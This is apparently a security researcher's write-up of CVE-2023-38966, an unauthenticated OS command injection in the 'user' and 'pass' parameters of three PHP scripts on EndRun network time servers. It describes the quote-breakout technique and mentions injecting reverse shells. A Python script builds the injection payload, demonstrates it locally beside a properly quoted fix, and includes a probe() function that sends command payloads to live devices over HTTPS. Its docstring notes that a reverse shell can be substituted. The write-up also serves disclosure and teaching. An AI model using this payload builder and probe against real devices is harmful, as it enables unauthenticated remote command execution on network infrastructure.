[EndRun Technologies] - Multiple Unauthenticated RCE [ CVE-2023-38966 ]

EndRun Technologies is dedicated to the development and refinement of the technologies required to fulfill the demanding needs of the time and frequency community.

--------------------------------------------------------------------------------------------------------------------------

EndRun NTP servers are affected by OS command injection flaws that allow an unauthenticated attacker to execute arbitrary operating system commands on the device by placing shell metacharacters in the "user" and "pass" parameters handled by the login_check.php, upgrade_linux.php and webreboot.php scripts.

Requirements:
- No authentication: the vulnerable scripts execute the injected command before any credentials are validated
- Network access to the device's HTTPS web interface
- The device is reachable by the attacker (in the worst case, exposed directly to the Internet)

Affected Devices:

  •   Tempus LX CDMA Network Time Server
  •   Sonoma Network Time Server GPS-Synchronized
  •   RTM3205 Precision Timing Module
  •   Meridian II 2U Precision TimeBase
  •   Unison CDME Network Time Server

Affected Components:
  •   login_check.php - Parameters [ user & pass ]
  •   upgrade_linux.php - Parameters [ user & pass ]
  •   webreboot.php - Parameters [ user & pass ]


login_check.php

The login_check.php resource receives the "user" and "pass" parameters without sanitizing them and interpolates them directly into a shell command line that is run through PHP's system() function to "echo" the variable. Because the value is placed inside a single-quoted shell string, an attacker can terminate that string with '; and append any operating system command, which the shell then executes.


So we close the quoted string with '; and then append the operating system command we want to execute.



Reverse shell


upgrade_linux.php

The upgrade_linux.php resource receives the "user" and "pass" parameters without sanitizing them and interpolates them directly into a shell command line that is run through PHP's shell_exec() function to "echo" the variable. As with login_check.php, injecting shell metacharacters lets an attacker append an operating system command of their choice.

So we close the quoted string with '; and then append the operating system command we want to execute; in this case, we inject a reverse shell.


webreboot.php

The webreboot.php resource receives the "user" and "pass" parameters without sanitizing them and interpolates them directly into a shell command line that is run through PHP's exec() function to "echo" the variable. Again, shell metacharacters in the parameter value let an attacker append an operating system command of their choice.


So we close the quoted string with '; and then append the operating system command we want to execute; in this case, we inject a reverse shell.
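The following Python script is an added example written for this write-up; it is not code from the original post, from @linuxmonr4 or from EndRun. It covers all three scripts above, since the injection mechanics are identical: build_payload() produces the '; breakout for the assumed echo '<value>' template, vulnerable_echo() reproduces that unescaped pattern locally so the breakout can be observed without a device, hardened_echo() shows the same command with the argument quoted (shlex.quote() is the Python counterpart of PHP's escapeshellarg(), which is the fix on the PHP side), and probe() sends a harmless marker to a target instead of a reverse shell so the bug can be confirmed safely. Assumptions not stated on the page: the parameters are sent as a POST form body, the script's output is reflected in the HTTP response (true for system(), not necessarily for exec(), hence the time-based blind mode), and the device uses a self-signed certificate.

```python
import secrets
import shlex
import ssl
import subprocess
import time
import urllib.parse
import urllib.request


def build_payload(command: str, prefix: str = "x") -> str:
    """Value for the user/pass parameter that breaks out of the quoted echo.

    Assumed server-side template (not shown on the page): echo '<value>'.
    The payload closes the opening quote, runs COMMAND, then re-opens a
    quote so the template's trailing quote stays balanced.
    """
    return f"{prefix}'; {command}; echo '"


def vulnerable_echo(value: str) -> str:
    """Local model of the flawed pattern described in the write-up: the
    parameter is concatenated into an echo command line and handed to the
    shell unescaped (as PHP system()/shell_exec()/exec() do with a raw string).
    Deliberately unsafe; it exists only to show the breakout."""
    cmd = f"echo '{value}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_echo(value: str) -> str:
    """Same command with the argument properly quoted. The injected text is
    printed literally instead of being executed."""
    cmd = f"echo {shlex.quote(value)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def injection_confirmed(output: str, token: str) -> bool:
    """True when TOKEN appears on a line of its own, i.e. the injected
    'echo TOKEN' actually ran rather than being printed inside the payload."""
    return token in output.splitlines()


def probe(base_url: str, endpoint: str = "login_check.php", blind: bool = False,
          delay: int = 5, verify_tls: bool = False, timeout: float = 30.0) -> bool:
    """Send a marker payload to one of the three scripts and report whether it
    executed. Non-blind mode looks for an echoed random token in the response;
    blind mode injects 'sleep DELAY' and checks the response time, for scripts
    whose output is not reflected. Any other command (e.g. a reverse shell
    one-liner) can be substituted for the marker once the bug is confirmed."""
    token = secrets.token_hex(8)
    command = f"sleep {delay}" if blind else f"echo {token}"
    body = urllib.parse.urlencode({"user": build_payload(command), "pass": "x"}).encode()
    ctx = ssl.create_default_context()
    if not verify_tls:  # assumption: self-signed certificate on the device
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/{endpoint}", data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        text = resp.read().decode(errors="replace")
    elapsed = time.monotonic() - start
    return elapsed >= delay if blind else injection_confirmed(text, token)


if __name__ == "__main__":
    # Local demonstration only; no network traffic is generated.
    payload = build_payload("echo INJECTED")
    print("payload            :", payload)
    print("vulnerable output  :", repr(vulnerable_echo(payload)))
    print("hardened output    :", repr(hardened_echo(payload)))
    # Against a real target: probe("https://ntp.example.internal", "webreboot.php", blind=True)
```

Run it without arguments to see the breakout locally: the unescaped variant prints INJECTED on its own line, while the quoted variant prints the whole payload as one literal string. Use probe() against a device you are authorized to test; prefer the token check for login_check.php and upgrade_linux.php and the blind timing check for webreboot.php, whose exec() output may not be reflected.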




By: @linuxmonr4
